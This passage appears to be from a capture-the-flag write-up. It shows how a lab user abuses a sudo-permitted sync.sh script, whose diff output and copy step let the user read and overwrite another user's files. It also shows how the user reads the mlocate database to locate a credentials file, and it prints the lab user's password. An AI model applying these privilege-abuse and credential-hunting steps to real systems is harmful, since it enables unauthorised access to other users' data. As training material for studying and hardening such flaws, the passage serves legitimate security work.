t.miller


Checking the sudo privileges of the t.miller user after the lateral movement

t.miller@marketing:~$ sudo -l
[sudo] password for t.miller: EzPwz2022_dev1$$23!!
Matching Defaults entries for t.miller on marketing:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User t.miller may run the following commands on marketing:
    (m.sander) /usr/bin/sync.sh

The t.miller user can execute /usr/bin/sync.sh as the m.sander user.

/usr/bin/sync.sh


t.miller@marketing:~$ ll /usr/bin/sync.sh
-rwxr-xr-x 1 root root 386 Jul 13  2022 /usr/bin/sync.sh*
 
 
t.miller@marketing:~$ cat /usr/bin/sync.sh
#! /bin/bash
 
if [ -z $1 ]; then
    echo "error: note missing"
    exit
fi
 
note=$1
 
if [[ "$note" =~ .*m.sander.* ]]; then
    echo "error: forbidden"
    exit
fi
 
difference=$(diff /home/m.sander/personal/notes.txt $note)
 
if [[ -z $difference ]]; then
    echo "no update"
    exit
fi
 
echo "Difference: $difference"
 
cp $note /home/m.sander/personal/notes.txt
 
echo "[+] Updated."

This bash script performs the following:

  • takes a file path as its argument and compares that file to /home/m.sander/personal/notes.txt using diff
  • if there is a difference, it prints the diff and the argument file is copied (cp) over /home/m.sander/personal/notes.txt

Execution Flow


t.miller@marketing:/var/tmp$ echo supersecret > test
t.miller@marketing:/var/tmp$ sudo -u m.sander /usr/bin/sync.sh ./test 
Difference: 1,3c1
< == NOTES ==
< - remove vhost from website (done)
< - update to newer version (todo)
\ No newline at end of file
---
> supersecret
[+] Updated.

In this way it is possible to copy and read files that are only accessible to the m.sander user: the printed diff discloses the current contents of notes.txt, and the copy step overwrites it.
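For comparison, a hardened rewrite of the same script (an added example, not the script found on the box): it restricts the argument to a regular file under a staging directory, resolves the real path instead of pattern-matching the string, and never prints the diff. NOTES_FILE and STAGING_DIR are assumed names.

```shell
#!/bin/bash
# Added example (not the script from the box): a hardened sync.sh.
# Assumptions: NOTES_FILE is the target file and submitted notes must be
# regular files located under STAGING_DIR; both names are hypothetical.
set -eu

NOTES_FILE="${NOTES_FILE:-/home/m.sander/personal/notes.txt}"
STAGING_DIR="${STAGING_DIR:-/var/tmp/notes-inbox}"

# Accept only an existing regular file (not a symlink) whose canonical
# path is inside STAGING_DIR. A substring check on the argument, as in
# the original, cannot see what the path actually resolves to.
validate_note() {
    local note="$1" real staging
    [ -n "$note" ] || return 1
    [ -f "$note" ] && [ ! -L "$note" ] || return 1
    real=$(realpath -e -- "$note") || return 1
    staging=$(realpath -e -- "$STAGING_DIR") || return 1
    case "$real" in
        "$staging"/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Replace NOTES_FILE with the submitted note. The diff is deliberately
# not printed: echoing it discloses the current contents of NOTES_FILE
# to the caller, which is the read primitive shown above.
sync_note() {
    if ! validate_note "${1:-}"; then
        echo "error: note must be a regular file inside $STAGING_DIR" >&2
        return 1
    fi
    if cmp -s -- "$1" "$NOTES_FILE"; then
        echo "no update"
        return 0
    fi
    cp -- "$1" "$NOTES_FILE"
    echo "[+] Updated."
}
```

With this version the sudo rule still lets t.miller push a note, but neither the diff output nor a path or symlink outside the staging directory gives access to other files owned by m.sander.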

mlocate Group


t.miller@marketing:/var/tmp$ id
uid=1000(t.miller) gid=1000(t.miller) groups=1000(t.miller),24(cdrom),46(plugdev),50(staff),100(users),119(mlocate)

Looking back at the group membership of the t.miller user, mlocate is present.

mlocate is a Linux utility that maintains a database of file paths and enables fast file searches using the locate command. It updates its database efficiently with updatedb, providing quick lookups while respecting file permissions for security.

t.miller@marketing:/var/tmp$ find / -group mlocate -ls -type f 2>/dev/null
   546950   4868 -rw-r-----   1 root     mlocate   4981603 Jul 13  2022 /var/lib/mlocate/mlocate.db
    45184     48 -rwxr-sr-x   1 root     mlocate     47344 Jul 16  2019 /usr/bin/mlocate

/var/lib/mlocate/mlocate.db is the database file. It should list nearly every file path on the system, and since it is group-readable by mlocate (-rw-r-----), t.miller can read it directly.

t.miller@marketing:/var/tmp$ grep -a -w m.sander /var/lib/mlocate/mlocate.db 

Searching the database for the m.sander user reveals an interesting file in the /home/m.sander/personal directory, alongside notes.txt: creds-for-2022.txt. Leveraging the copy-and-read capability of /usr/bin/sync.sh, it would be possible to read its contents.